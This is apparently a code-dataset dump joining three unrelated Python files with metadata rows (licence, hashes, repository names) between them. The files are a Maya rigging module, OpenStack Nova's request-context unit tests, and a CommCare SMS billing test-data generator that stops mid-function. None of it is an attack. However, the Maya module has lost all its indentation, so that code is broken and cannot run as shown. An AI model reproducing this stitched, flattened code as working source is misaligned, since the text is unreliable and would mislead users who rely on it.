return
# Break down namespace info for easy access
moduleNamespaceInfo = utils.StripAllNamespaces(_moduleNamespace)
self.blueprintNamespace = moduleNamespaceInfo[0]
self.moduleNamespace = moduleNamespaceInfo[1]
self.characterNamespace = utils.StripLeadingNamespace(self.blueprintNamespace)[0]
self.moduleContainer = "%s:%s:module_container" %(self.blueprintNamespace, self.moduleNamespace)
# DERIVED CLASS METHODS
def Install_custom(self, _joints, _moduleGrp, _moduleContainer):
print "Install_custom() method not implemented bt derived module"
def CompatibleBlueprintModules(self):
return ("-1")
def UI(self, _parentLayout):
print "No custom user interface provided"
def UI_preferences(self, _parentLayout):
print "No custom user interface provided"
def Match(self, *args):
print "No matching functionality provided"
# BASE CLASS METHODS
def Install(self):
nodes = self.Install_init()
joints = nodes[0]
moduleGrp = nodes[1]
moduleContainer = nodes[2]
self.Install_custom(joints, moduleGrp, moduleContainer)
self.Install_finalize()
def Install_init(self):
pm.namespace(setNamespace = self.blueprintNamespace)
pm.namespace(add = self.moduleNamespace)
pm.namespace(setNamespace = ":")
characterContainer = "%s:character_container" %self.characterNamespace
blueprintContainer = "%s:module_container" %self.blueprintNamespace
container = [characterContainer, blueprintContainer]
for c in container:
pm.lockNode(c, lock = False, lockUnpublished = False)
self.joints = self.DuplicateAndRenameCreationPose()
moduleJointsGrp = self.joints[0]
moduleGrp = pm.group(empty = True, name = "%s:%s:module_grp" %(self.blueprintNamespace, self.moduleNamespace))
hookIn = "%s:HOOK_IN" %self.blueprintNamespace
pm.parent(moduleGrp, hookIn, relative = True)
pm.parent(moduleJointsGrp, moduleGrp, absolute = True)
pm.select(moduleGrp, replace = True)
pm.addAttr(attributeType = "float", longName = "iconScale", minValue = 0.001, softMaxValue = 10.0, defaultValue = 1.0, keyable = True)
pm.setAttr("%s.overrideEnabled" %moduleGrp, 1)
pm.setAttr("%s.overrideColor" %moduleGrp, 6)
utilityNodes = self.SetupBlueprintWeightBasedBlending()
self.SetupModuleVisibility(moduleGrp)
containedNodes = []
containedNodes.extend(self.joints)
containedNodes.append(moduleGrp)
containedNodes.extend(utilityNodes)
self.moduleContainer = pm.container(name = self.moduleContainer)
utils.AddNodeToContainer(self.moduleContainer, containedNodes, True)
utils.AddNodeToContainer(blueprintContainer, self.moduleContainer)
index = 0
for joint in self.joints:
if index > 0:
niceJointName = utils.StripAllNamespaces(joint)[1]
self.PublishNameToModuleContainer("%s.rotate" %joint, "%s_R" %niceJointName, False)
index += 1
self.PublishNameToModuleContainer("%s.levelOfDetail" %moduleGrp, "Control_LOD")
self.PublishNameToModuleContainer("%s.iconScale" %moduleGrp, "Icon_Scale")
self.PublishNameToModuleContainer("%s.overrideColor" %moduleGrp, "Icon_Color")
self.PublishNameToModuleContainer("%s.visibility" %moduleGrp, "Visibility", False)
return (self.joints, moduleGrp, self.moduleContainer)
def Install_finalize(self):
self.PublishModuleContainerNamesToOuterContainers()
pm.setAttr("%s:blueprint_joints_grp.controlModulesInstalled" %self.blueprintNamespace, True)
characterContainer = "%s:character_container" %self.characterNamespace
blueprintContainer = "%s:module_container" %self.blueprintNamespace
containers = [characterContainer, blueprintContainer, self.moduleContainer]
for c in containers:
pm.lockNode(c, lock = True, lockUnpublished = True)
def DuplicateAndRenameCreationPose(self):
joints = pm.duplicate("%s:creationPose_joints_grp" %self.blueprintNamespace, renameChildren = True)
pm.select(joints, hierarchy = True)
joints = pm.ls(selection = True)
for i in range(len(joints)):
nameSuffix = joints[i].rpartition("creationPose_")[2]
joints[i] = pm.rename(joints[i], "%s:%s:%s" %(self.blueprintNamespace, self.moduleNamespace, nameSuffix))
return joints
def SetupBlueprintWeightBasedBlending(self):
settingsLocator = "%s:SETTINGS" %self.blueprintNamespace
attributes = pm.listAttr(settingsLocator, keyable = False)
weightAttributes = []
for attr in attributes:
if attr.find("_weight") != -1:
weightAttributes.append(attr)
value = 0
if len(weightAttributes) == 0:
value = 1
pm.setAttr("%s.creationPoseWeight" %settingsLocator, 0)
pm.select(settingsLocator, replace = True)
weightAttributeName = "%s_weight" %self.moduleNamespace
pm.addAttr(longName = weightAttributeName, attributeType = "double", minValue = 0, maxValue = 1, defaultValue = value, keyable = False)
pm.container("%s:module_container" %self.blueprintNamespace, edit = True, publishAndBind = ["%s.%s" %(settingsLocator, weightAttributeName), weightAttributeName])
currentEntries = pm.attributeQuery("activeModule", node = settingsLocator, listEnum = True)
newEntry = self.moduleNamespace
if currentEntries[0] == "None":
pm.addAttr("%s.activeModule" %settingsLocator, edit = True, enumName = newEntry)
pm.setAttr("%s.activeModule" %settingsLocator, 0)
else:
pm.addAttr("%s.activeModule" %settingsLocator, edit = True, enumName = "%s:%s" %(currentEntries[0], newEntry))
utilityNodes = []
for i in range(1, len(self.joints)):
joint = self.joints[i]
nameSuffix = utils.StripAllNamespaces(joint)[1]
blueprintJoint = "%s:blueprint_%s" %(self.blueprintNamespace, nameSuffix)
weightNodeAttr = "%s.%s" %(settingsLocator, weightAttributeName)
if i < len(self.joints) - 1 or len(self.joints) == 2:
multiplyRotations = pm.shadingNode("multiplyDivide", name = "%s_multiplyRotationsWeight" %joint, asUtility = True)
utilityNodes.append(multiplyRotations)
pm.connectAttr("%s.rotate" %joint, "%s.input1" %multiplyRotations, force = True)
for attr in ["input2X", "input2Y", "input2Z"]:
pm.connectAttr(weightNodeAttr, "%s.%s" %(multiplyRotations, attr), force = True)
index = utils.FindFirstFreeConnection("%s_addRotations.input3D" %blueprintJoint)
pm.connectAttr("%s.output" %multiplyRotations, "%s_addRotations.input3D[%d]" %(blueprintJoint, index), force = True)
if i == 1:
addNode = "%s_addTranslate" %blueprintJoint
if pm.objExists(addNode):
multiplyTranslation = pm.shadingNode("multiplyDivide", name = "%s_multiplyTranslationWeight" %joint, asUtility = True)
utilityNodes.append(multiplyTranslation)
pm.connectAttr("%s.translate" %joint, "%s.input1" %multiplyTranslation, force = True)
for attr in ["input2X", "input2Y", "input2Z"]:
pm.connectAttr(weightNodeAttr, "%s.%s" %(multiplyTranslation, attr), force = True)
index = utils.FindFirstFreeConnection("%s.input3D" %addNode)
pm.connectAttr("%s.output" %multiplyTranslation, "%s.input3D[%d]" %(addNode, index), force = True)
addNode = "%s_addScale" %blueprintJoint
if pm.objExists(addNode):
multiplyScale = pm.shadingNode("multiplyDivide", name = "%s_multiplyScaleWeight" %joint, asUtility = True)
utilityNodes.append(multiplyScale)
pm.connectAttr("%s.scale" %joint, "%s.input1" %multiplyScale, force = True)
for attr in ["input2X", "input2Y", "input2Z"]:
pm.connectAttr(weightNodeAttr, "%s.%s" %(multiplyScale, attr), force = True)
index = utils.FindFirstFreeConnection("%s.input3D" %addNode)
pm.connectAttr("%s.output" %multiplyScale, "%s.input3D[%d]" %(addNode, index), force = True)
else:
multiplyTranslation = pm.shadingNode("multiplyDivide", name = "%s_multiplyTranslationWeight" %joint, asUtility = True)
utilityNodes.append(multiplyTranslation)
pm.connectAttr("%s.translateX" %joint, "%s.input1X" %multiplyTranslation, force = True)
pm.connectAttr(weightNodeAttr, "%s.input2X" %multiplyTranslation, force = True)
addNode = "%s_addTx" %blueprintJoint
index = utils.FindFirstFreeConnection("%s.input1D" %addNode)
pm.connectAttr("%s.outputX" %multiplyTranslation, "%s.input1D[%d]" %(addNode, index), force = True)
return utilityNodes
def SetupModuleVisibility(self, _moduleGrp):
pm.select(_moduleGrp, replace = True)
pm.addAttr(attributeType = "byte", defaultValue = 1, minValue = 0, softMaxValue = 3, longName = "levelOfDetail", keyable = True)
moduleVisibilityMultiply = "%s:moduleVisibilityMultiply" %self.characterNamespace
pm.connectAttr("%s.outputX" %moduleVisibilityMultiply, "%s.visibility" %_moduleGrp, force = True)
def PublishNameToModuleContainer(self, _attribute, _attributeNiceName, _publishToOuterContainer = True):
if self.moduleContainer == None:
return
blueprintName = utils.StripLeadingNamespace(self.blueprintNamespace)[1].partition("__")[2]
attributePrefix = "%s_%s_" %(blueprintName, self.moduleNamespace)
publishedName = "%s%s" %(attributePrefix, _attributeNiceName)
if _publishToOuterContainer:
self.publishedNames.append(publishedName)
pm.container(self.moduleContainer, edit = True, publishAndBind = [_attribute, publishedName])
def PublishModuleContainerNamesToOuterContainers(self):
if self.moduleContainer == None:
return
characterContainer = "%s:character_container" %self.characterNamespace
blueprintContainer = "%s:module_container" %self.blueprintNamespace
for publishedNames in self.publishedNames:
outerPublishedNames = pm.container(blueprintContainer, query = True, publishName = True)
if publishedNames in outerPublishedNames:
continue
pm.container(blueprintContainer, edit = True, publishAndBind = ["%s.%s" %(self.moduleContainer, publishedNames), publishedNames])
pm.container(characterContainer, edit = True, publishAndBind = ["%s.%s" %(blueprintContainer, publishedNames), publishedNames])
def Uninstall(self):
characterContainer = "%s:character_container" %self.characterNamespace
blueprintContainer = "%s:module_container" %self.blueprintNamespace
moduleContainer = self.moduleContainer
containers = [characterContainer, blueprintContainer, moduleContainer]
for c in containers:
pm.lockNode(c, lock = False, lockUnpublished = False)
containers.pop()
blueprintJointsGrp = "%s:blueprint_joints_grp" %self.blueprintNamespace
blueprintJoints = utils.FindJointChain(blueprintJointsGrp)
blueprintJoints.pop(0)
settingsLocator = "%s:SETTINGS" %self.blueprintNamespace
connections = pm.listConnections("%s_addRotations" %blueprintJoints[0], source = True, destination = False)
if len(connections) == 2:
pm.setAttr("%s.controlModulesInstalled" %blueprintJointsGrp, False)
publishedNames = pm.container(moduleContainer, query = True, publishName = True)
publishedNames.sort()
for name in publishedNames:
outerPublishedNames = pm.container(characterContainer, query = True, publishName = True)
if name in outerPublishedNames:
pm.container(characterContainer, edit = True, unbindAndUnpublish = "%s.%s" %(blueprintContainer, name))
pm.container(blueprintContainer, edit = True, unbindAndUnpublish = "%s.%s" %(moduleContainer, name))
pm.delete(moduleContainer)
weightAttributeName = "%s_weight" %self.moduleNamespace
pm.deleteAttr("%s.%s" %(settingsLocator, weightAttributeName))
attributes = pm.listAttr(settingsLocator, keyable = False)
weightAttributes = []
for attr in attributes:
if attr.find("_weight") != -1:
weightAttributes.append(attr)
totalWeight = 0
for attr in weightAttributes:
totalWeight += pm.getAttr("%s.%s" %(settingsLocator, attr))
pm.setAttr("%s.creationPoseWeight" %settingsLocator, 1-totalWeight)
currentEntries = pm.attributeQuery("activeModule", node = settingsLocator, listEnum = True)
currentEntriesList = currentEntries[0].split(":")
ourEntry = self.moduleNamespace
currentEntriesString = ""
for entry in currentEntriesList:
if entry != ourEntry:
currentEntriesString += "%s:" %entry
if currentEntriesString == "":
currentEntriesString = "None"
pm.addAttr("%s.activeModule" %settingsLocator, edit = True, enumName = currentEntriesString)
pm.setAttr("%s.activeModule" %settingsLocator, 0)
pm.namespace(setNamespace = self.blueprintNamespace)
pm.namespace(removeNamespace = self.moduleNamespace)
pm.namespace(setNamespace = ":")
for c in containers:
pm.lockNode(c, lock = True, lockUnpublished = True)
|
mit
| 7,539,544,142,091,455,000 | 34.840659 | 164 | 0.722269 | false |
gooddata/openstack-nova
|
nova/tests/unit/test_context.py
|
1
|
22297
|
# Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_context import context as o_context
from oslo_context import fixture as o_fixture
from oslo_utils.fixture import uuidsentinel as uuids
from nova import context
from nova import exception
from nova import objects
from nova import test
from nova.tests import fixtures as nova_fixtures
class ContextTestCase(test.NoDBTestCase):
# NOTE(danms): Avoid any cells setup by claiming we will
# do things ourselves.
USES_DB_SELF = True
def setUp(self):
super(ContextTestCase, self).setUp()
self.useFixture(o_fixture.ClearRequestContext())
def test_request_context_elevated(self):
user_ctxt = context.RequestContext('111',
'222',
is_admin=False)
self.assertFalse(user_ctxt.is_admin)
admin_ctxt = user_ctxt.elevated()
self.assertTrue(admin_ctxt.is_admin)
self.assertIn('admin', admin_ctxt.roles)
self.assertFalse(user_ctxt.is_admin)
self.assertNotIn('admin', user_ctxt.roles)
def test_request_context_sets_is_admin(self):
ctxt = context.RequestContext('111',
'222',
roles=['admin', 'weasel'])
self.assertTrue(ctxt.is_admin)
def test_request_context_sets_is_admin_by_role(self):
ctxt = context.RequestContext('111',
'222',
roles=['administrator'])
self.assertTrue(ctxt.is_admin)
def test_request_context_sets_is_admin_upcase(self):
ctxt = context.RequestContext('111',
'222',
roles=['Admin', 'weasel'])
self.assertTrue(ctxt.is_admin)
def test_request_context_read_deleted(self):
ctxt = context.RequestContext('111',
'222',
read_deleted='yes')
self.assertEqual('yes', ctxt.read_deleted)
ctxt.read_deleted = 'no'
self.assertEqual('no', ctxt.read_deleted)
def test_request_context_read_deleted_invalid(self):
self.assertRaises(ValueError,
context.RequestContext,
'111',
'222',
read_deleted=True)
ctxt = context.RequestContext('111', '222')
self.assertRaises(ValueError,
setattr,
ctxt,
'read_deleted',
True)
def test_service_catalog_default(self):
ctxt = context.RequestContext('111', '222')
self.assertEqual([], ctxt.service_catalog)
ctxt = context.RequestContext('111', '222',
service_catalog=[])
self.assertEqual([], ctxt.service_catalog)
ctxt = context.RequestContext('111', '222',
service_catalog=None)
self.assertEqual([], ctxt.service_catalog)
def test_service_catalog_filter(self):
service_catalog = [
{u'type': u'compute', u'name': u'nova'},
{u'type': u's3', u'name': u's3'},
{u'type': u'image', u'name': u'glance'},
{u'type': u'volumev3', u'name': u'cinderv3'},
{u'type': u'network', u'name': u'neutron'},
{u'type': u'ec2', u'name': u'ec2'},
{u'type': u'object-store', u'name': u'swift'},
{u'type': u'identity', u'name': u'keystone'},
{u'type': u'block-storage', u'name': u'cinder'},
{u'type': None, u'name': u'S_withouttype'},
{u'type': u'vo', u'name': u'S_partofvolume'}]
volume_catalog = [{u'type': u'image', u'name': u'glance'},
{u'type': u'volumev3', u'name': u'cinderv3'},
{u'type': u'network', u'name': u'neutron'},
{u'type': u'block-storage', u'name': u'cinder'}]
ctxt = context.RequestContext('111', '222',
service_catalog=service_catalog)
self.assertEqual(volume_catalog, ctxt.service_catalog)
def test_to_dict_from_dict_no_log(self):
warns = []
def stub_warn(msg, *a, **kw):
if (a and len(a) == 1 and isinstance(a[0], dict) and a[0]):
a = a[0]
warns.append(str(msg) % a)
self.stub_out('nova.context.LOG.warning', stub_warn)
ctxt = context.RequestContext('111',
'222',
roles=['admin', 'weasel'])
context.RequestContext.from_dict(ctxt.to_dict())
self.assertEqual(0, len(warns), warns)
def test_store_when_no_overwrite(self):
# If no context exists we store one even if overwrite is false
# (since we are not overwriting anything).
ctx = context.RequestContext('111',
'222',
overwrite=False)
self.assertIs(o_context.get_current(), ctx)
def test_no_overwrite(self):
# If there is already a context in the cache a new one will
# not overwrite it if overwrite=False.
ctx1 = context.RequestContext('111',
'222',
overwrite=True)
context.RequestContext('333',
'444',
overwrite=False)
self.assertIs(o_context.get_current(), ctx1)
def test_get_context_no_overwrite(self):
# If there is already a context in the cache creating another context
# should not overwrite it.
ctx1 = context.RequestContext('111',
'222',
overwrite=True)
context.get_context()
self.assertIs(ctx1, o_context.get_current())
def test_admin_no_overwrite(self):
# If there is already a context in the cache creating an admin
# context will not overwrite it.
ctx1 = context.RequestContext('111',
'222',
overwrite=True)
context.get_admin_context()
self.assertIs(o_context.get_current(), ctx1)
def test_convert_from_rc_to_dict(self):
ctx = context.RequestContext(
111, 222, request_id='req-679033b7-1755-4929-bf85-eb3bfaef7e0b',
timestamp='2015-03-02T22:31:56.641629')
values2 = ctx.to_dict()
expected_values = {'auth_token': None,
'domain': None,
'is_admin': False,
'is_admin_project': True,
'project_id': 222,
'project_domain': None,
'project_name': None,
'quota_class': None,
'read_deleted': 'no',
'read_only': False,
'remote_address': None,
'request_id':
'req-679033b7-1755-4929-bf85-eb3bfaef7e0b',
'resource_uuid': None,
'roles': [],
'service_catalog': [],
'show_deleted': False,
'tenant': 222,
'timestamp': '2015-03-02T22:31:56.641629',
'user': 111,
'user_domain': None,
'user_id': 111,
'user_identity': '111 222 - - -',
'user_name': None}
for k, v in expected_values.items():
self.assertIn(k, values2)
self.assertEqual(values2[k], v)
@mock.patch.object(context.policy, 'authorize')
def test_can(self, mock_authorize):
mock_authorize.return_value = True
ctxt = context.RequestContext('111', '222')
result = ctxt.can(mock.sentinel.rule)
self.assertTrue(result)
mock_authorize.assert_called_once_with(
ctxt, mock.sentinel.rule,
{'project_id': ctxt.project_id, 'user_id': ctxt.user_id})
@mock.patch.object(context.policy, 'authorize')
def test_can_fatal(self, mock_authorize):
mock_authorize.side_effect = exception.Forbidden
ctxt = context.RequestContext('111', '222')
self.assertRaises(exception.Forbidden,
ctxt.can, mock.sentinel.rule)
@mock.patch.object(context.policy, 'authorize')
def test_can_non_fatal(self, mock_authorize):
mock_authorize.side_effect = exception.Forbidden
ctxt = context.RequestContext('111', '222')
result = ctxt.can(mock.sentinel.rule, mock.sentinel.target,
fatal=False)
self.assertFalse(result)
mock_authorize.assert_called_once_with(ctxt, mock.sentinel.rule,
mock.sentinel.target)
@mock.patch('nova.rpc.create_transport')
@mock.patch('nova.db.api.create_context_manager')
def test_target_cell(self, mock_create_ctxt_mgr, mock_rpc):
mock_create_ctxt_mgr.return_value = mock.sentinel.cdb
mock_rpc.return_value = mock.sentinel.cmq
ctxt = context.RequestContext('111',
'222',
roles=['admin', 'weasel'])
# Verify the existing db_connection, if any, is restored
ctxt.db_connection = mock.sentinel.db_conn
ctxt.mq_connection = mock.sentinel.mq_conn
mapping = objects.CellMapping(database_connection='fake://',
transport_url='fake://',
uuid=uuids.cell)
with context.target_cell(ctxt, mapping) as cctxt:
self.assertEqual(cctxt.db_connection, mock.sentinel.cdb)
self.assertEqual(cctxt.mq_connection, mock.sentinel.cmq)
self.assertEqual(cctxt.cell_uuid, mapping.uuid)
self.assertEqual(mock.sentinel.db_conn, ctxt.db_connection)
self.assertEqual(mock.sentinel.mq_conn, ctxt.mq_connection)
self.assertIsNone(ctxt.cell_uuid)
# Test again now that we have populated the cache
with context.target_cell(ctxt, mapping) as cctxt:
self.assertEqual(cctxt.db_connection, mock.sentinel.cdb)
self.assertEqual(cctxt.mq_connection, mock.sentinel.cmq)
self.assertEqual(cctxt.cell_uuid, mapping.uuid)
@mock.patch('nova.rpc.create_transport')
@mock.patch('nova.db.api.create_context_manager')
def test_target_cell_unset(self, mock_create_ctxt_mgr, mock_rpc):
"""Tests that passing None as the mapping will temporarily
untarget any previously set cell context.
"""
mock_create_ctxt_mgr.return_value = mock.sentinel.cdb
mock_rpc.return_value = mock.sentinel.cmq
ctxt = context.RequestContext('111',
'222',
roles=['admin', 'weasel'])
ctxt.db_connection = mock.sentinel.db_conn
ctxt.mq_connection = mock.sentinel.mq_conn
with context.target_cell(ctxt, None) as cctxt:
self.assertIsNone(cctxt.db_connection)
self.assertIsNone(cctxt.mq_connection)
self.assertEqual(mock.sentinel.db_conn, ctxt.db_connection)
self.assertEqual(mock.sentinel.mq_conn, ctxt.mq_connection)
@mock.patch('nova.context.set_target_cell')
def test_target_cell_regenerates(self, mock_set):
ctxt = context.RequestContext('fake', 'fake')
# Set a non-tracked property on the context to make sure it
# does not make it to the targeted one (like a copy would do)
ctxt.sentinel = mock.sentinel.parent
with context.target_cell(ctxt, mock.sentinel.cm) as cctxt:
# Should be a different object
self.assertIsNot(cctxt, ctxt)
# Should not have inherited the non-tracked property
self.assertFalse(hasattr(cctxt, 'sentinel'),
'Targeted context was copied from original')
# Set another non-tracked property
cctxt.sentinel = mock.sentinel.child
# Make sure we didn't pollute the original context
self.assertNotEqual(ctxt.sentinel, mock.sentinel.child)
def test_get_context(self):
ctxt = context.get_context()
self.assertIsNone(ctxt.user_id)
self.assertIsNone(ctxt.project_id)
self.assertFalse(ctxt.is_admin)
@mock.patch('nova.rpc.create_transport')
@mock.patch('nova.db.api.create_context_manager')
def test_target_cell_caching(self, mock_create_cm, mock_create_tport):
mock_create_cm.return_value = mock.sentinel.db_conn_obj
mock_create_tport.return_value = mock.sentinel.mq_conn_obj
ctxt = context.get_context()
mapping = objects.CellMapping(database_connection='fake://db',
transport_url='fake://mq',
uuid=uuids.cell)
# First call should create new connection objects.
with context.target_cell(ctxt, mapping) as cctxt:
self.assertEqual(mock.sentinel.db_conn_obj, cctxt.db_connection)
self.assertEqual(mock.sentinel.mq_conn_obj, cctxt.mq_connection)
mock_create_cm.assert_called_once_with('fake://db')
mock_create_tport.assert_called_once_with('fake://mq')
# Second call should use cached objects.
mock_create_cm.reset_mock()
mock_create_tport.reset_mock()
with context.target_cell(ctxt, mapping) as cctxt:
self.assertEqual(mock.sentinel.db_conn_obj, cctxt.db_connection)
self.assertEqual(mock.sentinel.mq_conn_obj, cctxt.mq_connection)
mock_create_cm.assert_not_called()
mock_create_tport.assert_not_called()
@mock.patch('nova.context.target_cell')
@mock.patch('nova.objects.InstanceList.get_by_filters')
def test_scatter_gather_cells(self, mock_get_inst, mock_target_cell):
ctxt = context.get_context()
mapping = objects.CellMapping(database_connection='fake://db',
transport_url='fake://mq',
uuid=uuids.cell)
mappings = objects.CellMappingList(objects=[mapping])
# Use a mock manager to assert call order across mocks.
manager = mock.Mock()
manager.attach_mock(mock_get_inst, 'get_inst')
manager.attach_mock(mock_target_cell, 'target_cell')
filters = {'deleted': False}
context.scatter_gather_cells(
ctxt, mappings, 60, objects.InstanceList.get_by_filters, filters,
sort_dir='foo')
# NOTE(melwitt): This only works without the SpawnIsSynchronous fixture
# because when the spawn is treated as synchronous and the thread
# function is called immediately, it will occur inside the target_cell
# context manager scope when it wouldn't with a real spawn.
# Assert that InstanceList.get_by_filters was called before the
# target_cell context manager exited.
get_inst_call = mock.call.get_inst(
mock_target_cell.return_value.__enter__.return_value, filters,
sort_dir='foo')
expected_calls = [get_inst_call,
mock.call.target_cell().__exit__(None, None, None)]
manager.assert_has_calls(expected_calls)
@mock.patch('nova.context.LOG.warning')
@mock.patch('eventlet.timeout.Timeout')
@mock.patch('eventlet.queue.LightQueue.get')
@mock.patch('nova.objects.InstanceList.get_by_filters')
def test_scatter_gather_cells_timeout(self, mock_get_inst,
mock_get_result, mock_timeout,
mock_log_warning):
# This is needed because we're mocking get_by_filters.
self.useFixture(nova_fixtures.SpawnIsSynchronousFixture())
ctxt = context.get_context()
mapping0 = objects.CellMapping(database_connection='fake://db0',
transport_url='none:///',
uuid=objects.CellMapping.CELL0_UUID)
mapping1 = objects.CellMapping(database_connection='fake://db1',
transport_url='fake://mq1',
uuid=uuids.cell1)
mappings = objects.CellMappingList(objects=[mapping0, mapping1])
# Simulate cell1 not responding.
mock_get_result.side_effect = [(mapping0.uuid,
mock.sentinel.instances),
exception.CellTimeout()]
results = context.scatter_gather_cells(
ctxt, mappings, 30, objects.InstanceList.get_by_filters)
self.assertEqual(2, len(results))
self.assertIn(mock.sentinel.instances, results.values())
self.assertIn(context.did_not_respond_sentinel, results.values())
mock_timeout.assert_called_once_with(30, exception.CellTimeout)
self.assertTrue(mock_log_warning.called)
@mock.patch('nova.context.LOG.exception')
@mock.patch('nova.objects.InstanceList.get_by_filters')
def test_scatter_gather_cells_exception(self, mock_get_inst,
mock_log_exception):
# This is needed because we're mocking get_by_filters.
self.useFixture(nova_fixtures.SpawnIsSynchronousFixture())
ctxt = context.get_context()
mapping0 = objects.CellMapping(database_connection='fake://db0',
transport_url='none:///',
uuid=objects.CellMapping.CELL0_UUID)
mapping1 = objects.CellMapping(database_connection='fake://db1',
transport_url='fake://mq1',
uuid=uuids.cell1)
mappings = objects.CellMappingList(objects=[mapping0, mapping1])
# Simulate cell1 raising an exception.
mock_get_inst.side_effect = [mock.sentinel.instances,
test.TestingException()]
results = context.scatter_gather_cells(
ctxt, mappings, 30, objects.InstanceList.get_by_filters)
self.assertEqual(2, len(results))
self.assertIn(mock.sentinel.instances, results.values())
self.assertIn(context.raised_exception_sentinel, results.values())
self.assertTrue(mock_log_exception.called)
@mock.patch('nova.context.scatter_gather_cells')
@mock.patch('nova.objects.CellMappingList.get_all')
def test_scatter_gather_all_cells(self, mock_get_all, mock_scatter):
ctxt = context.get_context()
mapping0 = objects.CellMapping(database_connection='fake://db0',
transport_url='none:///',
uuid=objects.CellMapping.CELL0_UUID)
mapping1 = objects.CellMapping(database_connection='fake://db1',
transport_url='fake://mq1',
uuid=uuids.cell1)
mock_get_all.return_value = objects.CellMappingList(
objects=[mapping0, mapping1])
filters = {'deleted': False}
context.scatter_gather_all_cells(
ctxt, objects.InstanceList.get_by_filters, filters, sort_dir='foo')
mock_scatter.assert_called_once_with(
ctxt, mock_get_all.return_value, 60,
objects.InstanceList.get_by_filters, filters, sort_dir='foo')
@mock.patch('nova.context.scatter_gather_cells')
@mock.patch('nova.objects.CellMappingList.get_all')
def test_scatter_gather_skip_cell0(self, mock_get_all, mock_scatter):
ctxt = context.get_context()
mapping0 = objects.CellMapping(database_connection='fake://db0',
transport_url='none:///',
uuid=objects.CellMapping.CELL0_UUID)
mapping1 = objects.CellMapping(database_connection='fake://db1',
transport_url='fake://mq1',
uuid=uuids.cell1)
mock_get_all.return_value = objects.CellMappingList(
objects=[mapping0, mapping1])
filters = {'deleted': False}
context.scatter_gather_skip_cell0(
ctxt, objects.InstanceList.get_by_filters, filters, sort_dir='foo')
mock_scatter.assert_called_once_with(
ctxt, [mapping1], 60, objects.InstanceList.get_by_filters, filters,
sort_dir='foo')
@mock.patch('nova.context.scatter_gather_cells')
def test_scatter_gather_single_cell(self, mock_scatter):
ctxt = context.get_context()
mapping0 = objects.CellMapping(database_connection='fake://db0',
transport_url='none:///',
uuid=objects.CellMapping.CELL0_UUID)
filters = {'deleted': False}
context.scatter_gather_single_cell(ctxt, mapping0,
objects.InstanceList.get_by_filters, filters, sort_dir='foo')
mock_scatter.assert_called_once_with(
ctxt, [mapping0], context.CELL_TIMEOUT,
objects.InstanceList.get_by_filters, filters,
sort_dir='foo')
|
apache-2.0
| 8,326,044,055,298,230,000 | 45.068182 | 79 | 0.562407 | false |
qedsoftware/commcare-hq
|
corehq/apps/smsbillables/tests/generator.py
|
1
|
10417
|
import calendar
import random
import datetime
import string
import uuid
from collections import namedtuple
from decimal import Decimal
from dimagi.utils.data import generator as data_gen
from corehq.apps.accounting.models import Currency
from corehq.apps.sms.models import INCOMING, OUTGOING, SMS
from corehq.apps.sms.util import get_sms_backend_classes
from corehq.apps.smsbillables.models import SmsBillable, SmsGatewayFee, SmsUsageFee
from corehq.messaging.smsbackends.twilio.models import SQLTwilioBackend
from corehq.util.test_utils import unit_testing_only
# arbitrarily generated once from http://www.generatedata.com/
SMS_MESSAGE_CONTENT = [
"Nullam scelerisque neque sed sem", "non massa non ante bibendum", "lectus, a sollicitudin orci sem",
"felis, adipiscing fringilla, porttitor vulputate", "nibh. Phasellus nulla. Integer vulputate",
"pede, malesuada vel, venenatis vel", "molestie arcu. Sed eu nibh", "non nisi. Aenean eget metus.",
"luctus. Curabitur egestas nunc sed", "risus. Nulla eget metus eu", "penatibus et magnis dis parturient",
"malesuada ut, sem. Nulla interdum.", "diam luctus lobortis. Class aptent", "enim. Nunc ut erat. Sed",
"pede. Praesent eu dui. Cum", "Duis ac arcu. Nunc mauris.", "vel nisl. Quisque fringilla euismod",
"consequat purus. Maecenas libero est", "ultrices posuere cubilia Curae; Donec", "hymenaeos. Mauris ut quam vel",
"dolor quam, elementum at, egestas", "Praesent eu dui. Cum sociis", "nisl. Quisque fringilla euismod enim.",
"nunc, ullamcorper eu, euismod ac", "varius orci, in consequat enim", "convallis ligula. Donec luctus aliquet"
]
TEST_DOMAIN = "test"
TEST_NUMBER = "16175005454"
TEST_COUNTRY_CODES = (1, 20, 30, 220, 501)
OTHER_COUNTRY_CODES = (31, 40, 245, 502)
DIRECTIONS = [INCOMING, OUTGOING]
CountryPrefixPair = namedtuple('CountryPrefixPair', ['country_code', 'prefix'])
@unit_testing_only
def arbitrary_message():
return random.choice(SMS_MESSAGE_CONTENT)
@unit_testing_only
def arbitrary_fee():
return Decimal(str(round(random.uniform(0.0, 1.0), 4)))
@unit_testing_only
def _generate_prefixes(country_code, max_prefix_length, num_prefixes_per_size):
def _generate_prefix(cc, existing_prefixes, i):
while True:
prefix = existing_prefixes[-1 - i] + str(random.randint(0 if cc != 1 else 2, 9))
if prefix not in existing_prefixes:
return prefix
prefixes = [""]
for _ in range(max_prefix_length):
for i in range(num_prefixes_per_size):
prefixes.append(_generate_prefix(country_code, prefixes, i))
return prefixes
@unit_testing_only
def arbitrary_country_code_and_prefixes(
max_prefix_length, num_prefixes_per_size,
country_codes=TEST_COUNTRY_CODES
):
return [
CountryPrefixPair(str(country_code), prefix)
for country_code in country_codes
for prefix in _generate_prefixes(country_code, max_prefix_length, num_prefixes_per_size)
]
@unit_testing_only
def _available_gateway_fee_backends():
return filter(
lambda backend: backend.get_api_id() != SQLTwilioBackend.get_api_id(),
get_sms_backend_classes().values()
)
@unit_testing_only
def arbitrary_fees_by_prefix(backend_ids, country_codes_and_prefixes):
fees = {}
for direction in DIRECTIONS:
fees_by_backend = {}
for backend in _available_gateway_fee_backends():
fees_by_country_code = {}
for country_code, _ in country_codes_and_prefixes:
fees_by_country_code[country_code] = {}
for country_code, prefix in country_codes_and_prefixes:
fees_by_prefix = {
backend_instance: arbitrary_fee()
for backend_instance in [backend_ids[backend.get_api_id()], None]
}
fees_by_country_code[country_code][prefix] = fees_by_prefix
fees_by_backend[backend.get_api_id()] = fees_by_country_code
fees[direction] = fees_by_backend
return fees
@unit_testing_only
def arbitrary_phone_number(country_codes=TEST_COUNTRY_CODES):
